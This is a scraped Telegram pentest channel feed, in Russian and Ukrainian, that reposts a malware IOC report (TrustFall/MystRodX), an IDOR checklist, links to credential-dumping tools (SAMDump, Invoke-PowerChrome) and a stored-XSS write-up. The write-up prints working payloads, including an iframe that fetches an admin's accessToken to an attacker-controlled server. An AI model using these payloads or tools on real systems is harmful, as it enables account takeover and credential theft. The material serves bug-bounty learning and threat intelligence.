uk
Feedback
Fsecurity | HH

Fsecurity | HH

Відкрити в Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Показати більше
2 074
Підписники
-124 години
+37 днів
+1130 днів
Архів дописів

Repost from 1N73LL1G3NC3
SAMDump Extracts SAM and SYSTEM using Volume Shadow Copy (VSS) API with multiple exfiltration options and XOR obfuscation.
SAMDump Extracts SAM and SYSTEM using Volume Shadow Copy (VSS) API with multiple exfiltration options and XOR obfuscation.

🔍 TrustFall & MystRodX: Исследователи из АО ГТС на PROFIT.KZ представили разбор вредоносной активности, в которой фигури
+8
🔍 TrustFall & MystRodX: Исследователи из АО ГТС на PROFIT.KZ представили разбор вредоносной активности, в которой фигурируют два связанных инструмента — TrustFall и MystRodX. Они отдельно отметили, что о схожем вредоносе ранее писали аналитики QAX (@RedDrip7), которые использовали название MystRodX для такого же типа атаки. По данным ГТС, это звенья одной кампании, наблюдавшейся в 2025 году. 🧩 TrustFall (март 2025) Лёгкий backdoor: выполняет команды через /bin/sh, пакует данные (tar -czvf), удаляет следы (rm -rf) и отправляет информацию через POST на /news/data_form.php. Использует фиксированные C2 и позже — шифрование. 🧩 MystRodX (август 2025) Более новая стадия той же линии: обновлённый модуль с другим форматом сетевого обмена, зашифрованным трафиком и расширенной C2-инфраструктурой. Распространялся через 139.84.156.79. 🗃 IOC 185.154.154.135 213.159.64.6 2.56.177.181 37.221.125.201 5.252.22.232 45.14.244.110 45.83.140.218 154.196.162.76 Сервер распространения 139.84.156.79 Конфигурационные файлы tcbipkrn.config → 185.154.154.135 baeeajzb.config → 213.159.64.6 URI /news/data_form.php Поведенческие признаки tar -czvf rm -rf /bin/sh -c "<command>" шифрование трафика (в поздней активности) смена канала управления 🎯 APT группы:
STA-2201 Группа, впервые замеченная в 2019, работает по двум направлениям: • Initial Access Broker (первичный доступ) • Классическая APT-активность: кража и эксфильтрация данных Позже стала действовать более скрытно. Сектора: госуправление, телеком. STA-2404 Продвинутая хакерская группа, образованная после структурных изменений (детали скрыты). Активность отслеживается с 2024 года (две волны). Сектора: госуправление, энергетика, здравоохранение, наука, транспорт, финансы.
🔗 Ссылки • Презентация: https://profitday.kz/pdf/security2025/15.pdfsts.kz • Запись выступления: https://www.youtube.com/live/8eueDGkMMlo?t=26395https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor_en/ 🦔 THF

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from the sun
Всем привет! После долгого затишья, публикую новую авторскую заметку - на этот раз про Adaptix C2 В статье рассмотрим как создать свой листенер на Golang и агента на Powershell https://teletype.in/@magnummalum/adaptixc2-create-agent

Repost from 🕷 BugBountyRu
🕷 Чек-лист для поиска IDOR IDOR — один из самых распространенных и простых багов. Но знаешь ли ты все фазы тестирования, пос
+7
🕷 Чек-лист для поиска IDOR IDOR — один из самых распространенных и простых багов. Но знаешь ли ты все фазы тестирования, после которых с уверенностью можно сказать «Здесь нет IDOR»? Разобрали первую фазу, а остальные — в чек-листе ⬅️ 1️⃣ Подготовка и идентификация целей ✅Создай тестовые аккаунты: заведи два профиля — чтобы безопасно проверять операции, изменяющие состояние (POST/PUT/DELETE). ✅Поиск API: определи JSON-эндпоинты, которые используются под капотом отрендеренного HTML. ✅Поиск чувствительных операций: в первую очередь проверяй критичные фичи — сброс пароля, восстановление доступа, финансовые операции, личные сообщения, управление пользователями. ✅Проверяй каждый ID: выясни, является ли эндпоинт приватным или публичным и содержит ли он ID-параметры любого типа. ✅Утечки идентификаторов: проверь, не раскрываются ли ID через другие API-эндпоинты или публичные страницы (публичные профили, списки). ✅Полная карта клиентов: собери все источники запросов — веб, мобильные приложения, публичные/скрытые API. Для мобилок — извлеки запросы из декомпилированного приложения. Если есть swagger/openapi — добавь их в карту.

Repost from Fail Auth
HTML Injection → Stored XSS → Hijack accessToken Во время анализа одного из веб-приложений наткнулся на поле, которое обрабат
HTML Injection → Stored XSS → Hijack accessToken Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации. Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов. Решил проверить — вставил простой HTML:
<h1>Test</h1>    <!-- изменение размера шрифта -->
Текст стал крупнее — значит innerHTML или подобная конструкция. Далее потестировал теги:
<img src="x">    <!-- битая картинка -->
<input>          <!-- лишний input на странице -->
Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу ➡️ отображается в админке ➡️ возникает вопрос: можно ли это раскрутить до XSS? ➡️ Рабочий XSS-пэйлоад:
<iframe src="javascript:alert(localStorage.accessToken)"></iframe>
В данном случае он читает токен из localStorage и вызывает alert() с его значением. Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой. ➡️ Эскалация XSS:
<iframe src="javascript:fetch('//your.interact.sh?token=' + localStorage.accessToken)"></iframe>
Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена. Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта. ➡️ Особенность уязвимости теги:
🔴Инъекция сохраняется в БД (Stored) 🔴Отрабатывает на стороне администратора 🔴Через XSS читается accessToken из localStorage
➡️ Что это даёт:
🔴
Захват токена администратора
🔴
Возможность делать запросы от его имени
🔴
Потенциальный full access к admin-панели
➡️ Советы для тестирования:
🔴
Ищите HTML-теги, которые влияют на DOM (текст, форма, медиа)
🔴
Проверяйте innerHTML, outerHTML, dangerouslySetInnerHTML в React
🔴
Тестируйте на img, input, iframe, svg, math, script и template
🔴
Не ограничивайтесь alert(1), пробуйте localStorage, fetch, document.cookie, navigator, location
🔴
Используйте Interactsh, Burp Collaborator, xsshunter для подтверждения уязвимости

🔗Ссылка: https://opennet.ru/64257/

Repost from s0ld13r ch.
Invoke-PowerChrome 🌐 Invoke-PowerChrome - скрипт для сбора и декрипта паролей из браузеров (Chrome, Edge) написанный на Powe
Invoke-PowerChrome 🌐 Invoke-PowerChrome - скрипт для сбора и декрипта паролей из браузеров (Chrome, Edge) написанный на PowerShell. Хорошо подойдет для поиска дополнительных учеток, если уже есть права локального администратора 😃 Сам модуль будет интегрирован в PsMapExec для удаленного сбора паролей с хостов 😎
A PowerShell script for decrypting Chromium-based browser passwords, supporting both v10 (DPAPI user) and Google Chrome v20 (App Bound Encryption) encrypted blobs. The script dynamically interacts with Windows cryptographic APIs to decrypt passwords without external dependencies and can be executed in memory.
💻 Github: https://github.com/The-Viper-One/Invoke-PowerChrome 🧢 s0ld13r